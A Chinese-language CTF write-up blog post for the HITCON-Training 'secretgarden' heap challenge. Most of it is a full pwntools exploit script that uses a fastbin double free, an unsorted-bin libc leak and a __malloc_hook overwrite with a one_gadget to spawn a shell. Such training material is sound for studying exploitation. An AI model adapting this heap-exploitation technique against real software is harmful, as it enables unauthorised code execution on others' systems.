MENU

HITCON-Training lab12 secretgarden fastbin attack

December 17, 2020 • Read: 324 • Pwn

本来是在看Angelboy的视频来着,看到他有这个例题于是我就去github找,做完了才发现原来lab虽然序号一样,但是好像主题不是同一个。
阴差阳错做了这题,既然做了就放出来吧,不过我的写法不是最优写法。
题目中也有magic函数,但是我没用。

from pwn import *
from LibcSearcher import *
context.log_level = "debug"
r = process('./secretgarden')
#r = remote("training.pwnable.tw", 11012)
def choice(idx):
    r.sendlineafter("Your choice : ", str(idx))

def add(size, name = 'a', color = 'a'):
    choice(1)
    r.sendlineafter("Length of the name :", str(size))
    r.sendafter("The name of flower :", name)
    r.sendlineafter("The color of the flower :", color)

def visit():
    choice(2)

def delete(idx):
    choice(3)
    r.sendlineafter("Which flower do you want to remove from the garden:", str(idx))

def clean():
    choice(4)

add(0x68) #0
add(0x68) #1
add(0x68) #2

#double free
delete(0)
delete(1)
delete(0)

#fastbin attack & change size to 0xA1 for unsorted bin
add(0x68, '\x40') #3 == 0
add(0x68) #4 == 1
visit()
r.recvuntil('flower[3] :')
heap_addr = u64(r.recvuntil('\n')[:-1].ljust(8, '\x00'))
log.success('heap_addr: ' + hex(heap_addr))
add(0x68, p64(heap_addr + 0x60) + 'b' * 0x50 + p64(0x71) + p64(heap_addr + 0x60)) #5
add(0x68, '\x00') #6
add(0x68, p64(0) + p64(0x31) + p64(0) + p64(heap_addr + 0xB0) + '\x11' * 0x18 + p64(0xA1)) #7
delete(1)
add(0x68, p64(0) + p64(0x31) + p64(1) + p64(heap_addr + 0xE0)) #8
visit()

#unsorted bin leak
main_arena_addr = u64(r.recvuntil('\x7f')[-6:].ljust(8, '\x00')) - 88
log.success('main_arena_addr: ' + hex(main_arena_addr))
malloc_hook_addr = main_arena_addr - 0x10
log.success('malloc_hook_addr: ' + hex(malloc_hook_addr))
libc = LibcSearcher('__malloc_hook', malloc_hook_addr)
libc_base = malloc_hook_addr - libc.dump('__malloc_hook')
log.success('libc_base: ' + hex(libc_base))
one = [0x45226, 0x4527a, 0xf0364, 0xf1207]
one_gadget = libc_base + one[2]
log.success('one_gadget: ' + hex(one_gadget))

#getshell
add(0x68) #9
add(0x68) #10
delete(9)
delete(10)
delete(9)
add(0x68, p64(malloc_hook_addr - 0x23))
add(0x68)
add(0x68)
add(0x68, 'a' * 0x13 + p64(one_gadget))
delete(9)
delete(9)

r.interactive()
Archives QR Code Tip
QR Code for this page
Tipping QR Code